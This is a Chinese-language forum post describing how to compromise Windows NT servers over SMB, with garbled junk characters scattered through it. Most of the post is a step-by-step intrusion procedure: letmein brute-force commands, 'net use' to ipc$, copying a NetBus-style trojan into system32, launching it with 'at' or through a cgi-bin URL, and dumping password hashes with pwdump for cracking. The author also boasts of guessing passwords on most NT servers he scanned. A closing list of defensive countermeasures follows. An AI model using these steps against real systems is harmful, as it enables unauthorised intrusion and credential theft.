看了篇文章介绍使用netbus 或 netspy 远程入侵nt系统,感觉真是。。看来nt系统的共享机制如果不配合火墙使用,SMB会给你造成很大麻烦。。 连小小 只的木马都可以让nt管理员头大。
% P% K+ B: }& Q+ O! S( b" }& s2 \9 g 其攻击过程如下:
7 x/ s3 g4 X! u3 n3 |7 V1、使用扫描工具查找NT主机
. B9 I3 Q d( t2 、确定攻击目标后,使用letmein 对目标主机进行攻击, 如: * ]0 n( v8 p+ h( {" ]% A1 Z3 ]
letmein file://x.x.x.x/ -all -g mypwd (对\\x.x.x.x上所有用户攻击)
' d+ f) R c6 V1 L& D- sletmein file://x.x.x.x/ -admin -g mypwd (对\\x.x.x.x上管理员攻击)
( R# w$ t1 V6 Z! s, X) W2 Y& lletmein file://x.x.x.x/ -all -d mypwd (显示\\x.x.x.x上所有用户)
% f/ t) e# J( I3 [! w+ W注:- 确定目标后,收集目标信息并尝试取得非法资源 2 @; A3 a# S* r$ e) {3 @
3、当letmein 获取相关管理员权限后,使用ms提供的合法命令:
E7 k. q3 |/ ~* |0 ^$ Dnet use \\x.x.x.x\ipc$ "pass"/user:"user" 连接远程资源并将木马拷入远程
: o* L. F. {8 gcopy x:\netserver.exe \\x.x.x.x\admin$\system32 + Q% U; {$ e0 q
4、使用合法ms命令远程启动木马服务: 5 }& d8 c! O; r4 B' E2 t
netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg
" z4 y. ~9 u& `: r' c/ Y& W7 F& s( `8 A# h
该方法有其巧妙之处。。利用nt的任务计划管理,在特定时候启动木马服务 2 O+ B, ^$ z8 @/ w C7 \1 W8 b0 r' s
+ z! @, L% A$ J1 ]; e y4 f% r
另一种方法: . V$ _% U! H+ q/ U3 s, U. ~
将ntsrver.exe 或其他运行程序Copy到目的服务器的www可执行目录, 如cgi-bin或scripts,然后在浏览器键入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木马服务将被启动, P$ N8 V [& q( Q5 ^- D
" ]1 t3 e$ h i% `, Q6 \: Y, f
到此,该次攻击可以算成功了,远程资源已在别人控制下。 9 j0 F2 d, O ~/ w/ c- G& ?
如果在远程使用app redirect 启动一个cmd.exe到特定端口 , 那么你可以telnet 到该端口,更方便使用该远程资源 。比如:使用pwdump 将远程nt上所有用户和密码 dump成文件,回传本地,使用其他工具如l0phtcrack来运算。 分析该次攻击的整体过程,不难看出,关键步骤是letmein取得admin权限,但是很不幸,就目前厦门(有些是省内)的nt服务器管理员而言,密码对letmein只是多花几分钟而已。我对某些大的公共平台服务器进行扫描的结果,除了solaris和linux系统之外,其余的nt被letmein猜中率有75%以上。而且在这些被进入的机器上,SMB都有在tcp/ip上 跑,有两台有配备火墙,但是没有封闭对外137-139口。 2 p" ?8 |2 J+ J( E$ C" P! S/ O( h8 ?
" A7 _ t G* o! `# y! I 对策:
9 K! j6 U0 T! b3 d8 }* r$ W/ s! `; t1、还是老话,密码的选择问题,使用向..@2KjsfiM7v!09..这样的密码会让任何使用 暴力法计算的机器算到cpu烧掉。 4 s* E" T& `& x1 S1 G# R
2、nt网络的适当配置,不要在对外的nc绑定共享服务是个好习惯,特别是tcp/ip协议。
( i/ D8 m$ P7 q. o7 e$ F) y3、防火墙的配置,屏蔽一切不需要的服务端口,象netebui在tcp/ip上的137-139口,开这些口只会使你的系统处于危险的处境,如果非要在远程使用这些口的服务,建议使用其他软件来代替。 + W: y. j8 C4 E+ ?, y! U
4、及时检查日记和监控服务的运行,定时对文件系统的权限受托关系进行检查。 % N9 z5 f. S: @4 C, }! l/ }
5、管理人员素质的提高,安全风险意思加强无疑对你管理的系统有很多好处。 -- SPP 10Hz的低频 你听不到的声音却无时不刻在影响着你 。9 F6 z! q y' n0 ~ G/ v
|